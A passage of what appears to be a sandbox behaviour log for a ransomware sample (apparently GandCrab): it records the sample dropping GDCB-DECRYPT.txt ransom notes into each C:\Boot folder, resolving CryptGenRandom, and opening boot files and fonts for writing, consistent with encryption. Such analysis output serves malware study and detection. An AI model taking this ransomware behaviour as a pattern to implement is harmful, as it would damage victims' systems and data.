| File | Get Info | filename = C:\Boot\cs-CZ\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\cs-CZ\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\cs-CZ\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\cs-CZ\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\da-DK\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\da-DK\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\da-DK\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\da-DK\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\de-DE\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\de-DE\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\de-DE\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\de-DE\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\el-GR\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\el-GR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\el-GR\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\el-GR\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\en-GB\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\en-GB\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\en-US\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\en-US\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\en-US\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\en-US\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\es-ES\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\es-ES\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\es-ES\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\es-ES\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\et-EE\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\et-EE\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\fi-FI\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\fi-FI\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\fi-FI\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\fi-FI\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\chs_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\chs_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\cht_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\cht_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\jpn_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\jpn_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\kor_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\kor_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\malgunn_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\malgunn_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\malgun_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\malgun_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\meiryon_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\meiryon_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\meiryo_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\meiryo_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\msjhn_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\msjhn_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\msjh_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\msjh_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\msyhn_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\msyhn_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\msyh_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\msyh_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\segmono_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\segmono_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\segoen_slboot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\segoen_slboot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\segoe_slboot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\segoe_slboot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\Fonts\wgl4_boot.ttf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\Fonts\wgl4_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\fr-FR\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\fr-FR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\fr-FR\memtest.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\fr-FR\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\hr-HR\bootmgr.exe.mui, type = file_attributes |
